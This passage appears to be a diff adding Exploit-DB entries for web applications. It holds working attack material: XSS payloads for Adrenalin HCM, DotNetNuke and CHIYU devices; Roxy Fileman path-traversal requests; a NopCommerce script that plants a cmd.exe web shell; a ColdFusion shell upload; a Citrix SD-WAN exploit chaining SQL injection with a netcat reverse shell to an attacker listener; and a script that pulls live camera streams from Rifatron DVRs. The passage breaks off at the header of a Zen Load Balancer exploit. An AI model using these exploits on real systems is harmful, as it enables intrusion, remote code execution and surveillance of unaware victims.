# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.
URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
Parameter
====================
ReportId
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

125
exploits/aspx/webapps/47777.txt Normal file
View file

@ -0,0 +1,125 @@
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.
Proof of Concept
===========================
It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.
1) Create a shortcut file
By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.
2) Upload the file
Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.
Details of the request:
POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
-----------------------------159382831523528
Content-Disposition: form-data; name="action"
upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"
ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"
/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream
...data omitted...
-----------------------------159382831523528--
3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.
POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
Workaround / Fix:
===========================
Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
CREATEDIR, COPYFILE and RENAMEFILE.
Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published
Discovered By:
===========================
Patrik Lantz

79
exploits/aspx/webapps/47783.py Executable file
View file

@ -0,0 +1,79 @@
# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS
import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
def proxy(flag):
return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
def geturl(baseurl, type):
if type == "login":
return baseurl + "/login"
elif type == "mv":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
elif type == "mkdir":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
elif type == "put":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
elif type == "contactus":
return baseurl + "/contactus"
else:
return ""
def login(email, password, url, proxy):
res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
cookie = res.cookies.get_dict()
soup = BeautifulSoup(res.text, features="html.parser")
token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
cookies = res.cookies.get_dict()
return { **cookies, **cookie }
def shellupload(email, password, url, proxy):
print("[+] Trying uploading shell from")
cookies = login(email, password, url, proxy)
# Rename Common Directory
requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Create Common Directory
requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Upload File into Common
requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Test if it is working
res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
soup = BeautifulSoup(res.text, features="html.parser")
test = soup.find("span", {"id" : "cmdResult"})
if test is None:
print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
else:
print("[+] Shell uploaded under contact us page")
def main():
parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
parser.add_argument(
'-e', '--email', required=True, type=str, help='Username')
parser.add_argument(
'-p', '--password', required=True, type=str, help='Password')
parser.add_argument(
'-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
parser.add_argument(
'-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
args = parser.parse_args()
shellupload(args.email, args.password, args.url, proxy(args.proxy))
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
main()

50
exploits/aspx/webapps/47793.txt Normal file
View file

@ -0,0 +1,50 @@
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
Install
git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt
Requirements
This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
Usage
Compile mixed mode assembly DLL payload
In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
build_dll.bat sleep.c
Upload and load payload into application via insecure deserialization
Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{'fileInfo': {'ContentLength': 75264,
'ContentType': 'application/octet-stream',
'DateJson': '1970-01-01T00:00:00.000Z',
'FileName': '1576142987.918625.dll',
'Index': 0},
'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
'Telerik.Web.UI, Version=<VERSION>, '
'Culture=neutral, '
'PublicKeyToken=<TOKEN>',
'TempFileName': '1576142987.918625.dll'}}
[*] Triggering deserialization...
<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...
[*] Response time: 13.01 seconds
In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
Thanks
@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip

21
exploits/aspx/webapps/48124.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the users browser.
In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as <script>.
For instance, uploading the following code as an XML file executes javascript and shows a non-harmful XSS alert.
<?xml version="1.0" encoding="UTF-8"?>
<script xmlns="http://www.w3.org/1999/xhtml">
alert('XSS');
</script>
Though stealing of authentication cookies are not possible at this time (because the authentications cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.

70
exploits/aspx/webapps/48125.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.
As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.
Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.
For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browsers console (in the tab that manages profiles page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.
dnn.createFileUpload({
"clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
"moduleId": "",
"parentClientId": null,
"showOnStartup": true,
"folderPicker": {
"selectedItemCss": "selected-item",
"internalStateFieldId": null,
"disabled": false,
"selectItemDefaultText": "",
"initialState": {
"selectedItem": {
"key": "0",
"value": "My Folder"
}
},
"onSelectionChanged": []
},
"maxFileSize": 299892736,
"maxFiles": 0,
"extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
"resources": {
"title": "Upload Files",
"decompressLabel": "Decompress Zip Files",
"uploadToFolderLabel": "Upload To:",
"dragAndDropAreaTitle": "Drag files here or click to browse",
"uploadFileMethod": "Upload File",
"uploadFromWebMethod": "From URL",
"closeButtonText": "Close",
"uploadFromWebButtonText": "Upload",
"decompressingFile": "Decompressing File",
"fileIsTooLarge": "File size bigger than 286. Mb",
"fileUploadCancelled": "Upload cancelled",
"fileUploadFailed": "Upload failed",
"fileUploaded": "File uploaded",
"emptyFileUpload": "Your browser does not support empty file uploads.",
"fileAlreadyExists": "The file you want to upload already exists in this folder.",
"uploadStopped": "File upload stopped",
"urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
"keepButtonText": "Keep",
"replaceButtonText": "Replace",
"tooManyFiles": "You cannot upload more than {0} file(s) at once.",
"invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
"unzipFilePromptTitle": "Unzip Information",
"unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
"unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
"errorDialogTitle": "Error"
},
"width": 780,
"height": 630,
"folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
"parameters": {}
});

64
exploits/cfm/webapps/47392.txt Normal file
View file

@ -0,0 +1,64 @@
===========Security Intelligence============
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# Exploit Author: Pankaj Kumar Thakur (Nepal)
==========[Table of Contents]==============
* Overview
* Detailed description
* Thanks & Acknowledgements
* References
==========[Vulnerability Information]========
* Unrestricted file upload in Adobe ColdFusion 2018
* CWE-434
* Base Score: 6.8 MEDIUM
* Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
=========[ Overview]=========================
* System Affected: Adobe ColdFusion 2018
* Impact: Unrestricted file upload
=====[ Detailed description]=================
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
Request
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: hostname:portno
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Content-Type: multipart/form-data;
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
.
.
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file with extension"
Content-Type: image/jpeg
shell code
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
.
.
After uploading shell, its located here
http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
=====[ Thanks & Acknowledgements]========================================
* Acknowledged by Adobe
* Duplicate
* https://nvd.nist.gov/vuln/detail/CVE-2016-10258
* https://www.cvedetails.com/cve/CVE-2016-1713/
* https://www.openwall.com/lists/oss-security/2016/01/12/4
=====[ EOF ]===========================================================

104
exploits/cgi/webapps/47112.py Executable file
View file

@ -0,0 +1,104 @@
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 10 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
token = random.randint(10000, 99999)
json = {
"get_package_file": {
"site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
"appliance_type" : "primary",
"package_type" : "active"
}
}
try:
r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
return None
# error is expected
expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
if (r.status_code == 400 and r.json() == expected):
return token
else:
return None
# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
success = False
try:
r = requests.get(url, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
success = True
# a timeout is success. it means we should have a shell
return success
##### MAIN #####
desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
print "Starting... be patient. This takes a sec."
# Path to target app
base_url = 'https://' + args.t
# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
err_and_exit('SQL injection failed.')
print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
if success is False:
err_and_exit('Not so sure command injection worked. Expected a timeout.')
print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'

75
exploits/cgi/webapps/47368.sh Executable file
View file

@ -0,0 +1,75 @@
#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
# Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per secone(fps) and have been focusing on highend products and
# large projects in a variety applications and merket. These include government
# and public services, banking and finance, hotels and entertatinment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
# Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#
#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
echo "Ex.: $0 10.9.8.7:65432 10"
exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$STATUS" == "404" ]; then
echo "Target not vulnerable!"
exit
fi
echo "Collecting snapshots..."
for x in {1..10};
do echo -ne $x
curl "$HOST" -o sequence-$x.jpg -#;
sleep 0.6
done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}

23
exploits/cgi/webapps/48040.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839
# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.
# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!

110
exploits/cgi/webapps/48266.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
# Google Dork: no
# Date: 2020-03-28
# Exploit Author: Cody Sixteen
# Vendor Homepage: https://code610.blogspot.com
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2019-7301
#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
#!/usr/bin/env python
# zenload3r.py - zen load balancer pwn3r
